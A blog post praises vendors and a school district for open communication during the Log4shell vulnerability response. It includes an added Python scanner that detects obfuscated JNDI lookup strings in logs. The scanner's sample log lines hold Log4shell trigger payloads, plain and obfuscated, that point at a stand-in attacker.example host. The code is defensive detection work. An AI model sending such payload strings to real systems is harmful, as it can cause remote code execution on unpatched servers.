The cybersecurity landscape we all operate in is changing at an extremely rapid pace. We’ve just seen the most widespread vulnerability in a long time. Before that came years of data breach after data breach, supply chain attacks, major vulnerabilities, you name it. It creates challenges for red teamers, blue teamers, and purple teamers alike, and we’re all working out how to respond to this new world of threats.
However, this post isn’t about defensive or offensive security; it’s about how our businesses communicate when they respond to threats and incidents. For far too long, cybersecurity has been handcuffed by a “delta special ops force secret squirrel” mindset. The emphasis on OpSec has been so intense that it has crowded out our ability to contribute to the broader cyber community. If we can’t help each other, we’ll never win. We need to strike the right balance between OpSec and information sharing. Government does this better than you might think; just look at CISA.
Now, before I keep going: I’m not advocating that we share every detail every time we have a problem. I’m simply saying that we need to be transparent about vulnerabilities, attacks, IOCs, TTPs and the like. In the channel, where vendors reach end customers through partners, there’s an even greater obligation to be transparent. We need our downstream consumers (whether a partner or their customer) to be aware of the threat and how it’s being handled. After all, being left in the dark is worse than hearing bad news.
Believe it or not, this isn’t a doom and gloom post. I was inspired to write this because of a level of transparency I haven’t seen before. And that’s good news: we’re actually seeing progress on this front. It’s worth noting that I’m not talking about critical sector sharing programs like InfraGard. I’m talking about slam-dunk, here’s-what-we-know, full-on public transparency.
It started with Log4shell (CVE-2021-44228): a CVSS 10.0 CVE that pushed itself right into our holiday plans and impacted virtually everything built on Java. Holy shit, what a vuln, right?! It’s a nightmare, but our own team reacted extremely fast (YAY), and we also saw quick action from a number of channel vendors. I want to call a couple out here for kudos.
ConnectWise did an incredible job responding to and sharing information about Log4shell. Admittedly, there was a time I wasn’t impressed with the way they handled cyber. But they listened, iterated, and improved, and after all, that’s all we ask for. They were very quick to share what they knew and what the plan was, and quick with the follow-up.
Datto’s contribution was different but just as important: they launched a Log4shell detection tool that partners can run across their environments at scale.
Huntress is the gold standard for jumping into a cyber calamity to help! They worked with folks like Jason Slagle and released a brand-new testing tool within hours, so now anyone can test their servers to see whether they’re vulnerable to Log4shell.
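Tools like the two just mentioned tell you whether a server is exposed; the other half of the job is sweeping the logs you already have for exploitation attempts. The following is an added example, not code from the original post or from any of the vendors named above: a small Python scanner that hunts for the Log4shell trigger, a `${jndi:...}` lookup string, in logged request data. A naive grep for `jndi` misses the obfuscated forms attackers used from day one, such as `${${lower:j}ndi:...}` and `${${::-j}${::-n}${::-d}${::-i}:...}`, so the scanner first collapses Log4j’s `lower:`, `upper:` and `${key:-default}` lookups from the inside out, mimicking Log4j’s own substitution order, and only then matches the de-obfuscated string. The log lines and the `attacker.example` hostnames are constructed for the example.

```python
import re

# Constructed sample log lines (not taken from the page). The first three carry
# a JNDI lookup string in the User-Agent field, plain and obfuscated; the last
# two are benign, including a non-JNDI lookup that must not be flagged.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/b}"',
    '10.0.0.8 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /?q=${env:HOME} HTTP/1.1" 200 "curl/7.79"',
]

# An innermost lookup: ${...} whose body contains no nested ${ or }.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The de-obfuscated trigger we are hunting for (case-insensitive: ${upper:j} -> J).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def resolve_obfuscation(body: str):
    """Resolve one innermost lookup if it is one of the forms used purely for
    obfuscation; return None for anything else (e.g. jndi:, env:) so it is kept."""
    if ":-" in body:
        # ${key:-default}: the key lookup fails (or is empty), so the
        # substitutor emits the default. ${::-j} therefore yields "j".
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.strip().lower() == "lower":
        return rest.lower()
    if sep and prefix.strip().lower() == "upper":
        return rest.upper()
    return None


def normalize(text: str, max_rounds: int = 50) -> str:
    """Repeatedly collapse obfuscation lookups from the inside out until
    nothing more can be resolved (bounded so hostile input cannot spin)."""
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            resolved = resolve_obfuscation(match.group(1))
            if resolved is None:
                return match.group(0)  # not an obfuscation lookup: leave as-is
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def scan_logs(lines):
    """Return (line_index, normalized_jndi_lookup) for every line that
    contains a JNDI lookup once obfuscation is stripped."""
    hits = []
    for idx, line in enumerate(lines):
        normalized = normalize(line)
        for m in JNDI_LOOKUP.finditer(normalized):
            hits.append((idx, m.group(0)))
    return hits


if __name__ == "__main__":
    for idx, lookup in scan_logs(SAMPLE_LOGS):
        print(f"line {idx}: {lookup}")
```

This only resolves the three lookup types shown; attackers also leaned on other lookups with default values, and the default-value rule above catches those, but a real sweep should pair this with a wider pattern set and with the jar-inventory style checks the vendor tools perform, because a logged `${jndi:...}` string is evidence of an attempt, not proof that the receiving log4j-core version was vulnerable.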
This is one of my shameless-plug moments, of course, but I sincerely mean it when I say Pax8 did a kickass job on this. Before most people had finished their coffee, our Security Ops and Engineering teams were assessing and fixing the issue, checking for compromise, and getting ready to push new code, all of it. We then released a statement to put folks at ease. It was rapid-fire, effective action.
Those are just a few examples, and I’m sure there are others out there. My point is that we didn’t used to see this. My hope is that we keep this momentum and keep talking openly and honestly. If you’re a ConnectWise partner, surely you were put a little more at ease knowing they were looking into things, right? When you get more information, you can turn it into action and do what you need to do to protect your downstream clients.
This is the kind of transparency we need in cybersecurity, especially toward the public. We need to be prompt and thoughtful: come out and say “hey, this is potentially impacting us, and we’re investigating it,” then, as we learn more, share what will be meaningful to our business audience. With that in mind, I want to share a non-channel example that impacted me personally.
My Local School District
My kiddos are in Jeffco Public Schools, which runs a number of Java-based apps. In response to this vulnerability, their tech team made the difficult, but in my view very important, decision to take those systems offline. That is a critical step, and it deserves to be applauded! They even accepted an impact on next year’s enrollments to protect student and user privacy. This is huge, and I’m thankful they did it! It shows transparency from a sector that usually isn’t very transparent!
I wanted to share how happy I am to see transparency improving in the security space. It’s a must, and this progress needs to be kept up; hopefully we’ll see even more of it next time. I hope to see it expand into broader sharing of threat data, better community vulnerability management, and more open communication with the general public. This type of transparency raises the tide for everyone in security, and it also exposes the real cyber world to the general public in a way that will, hopefully, help them better understand the challenges we all face as cybersecurity practitioners.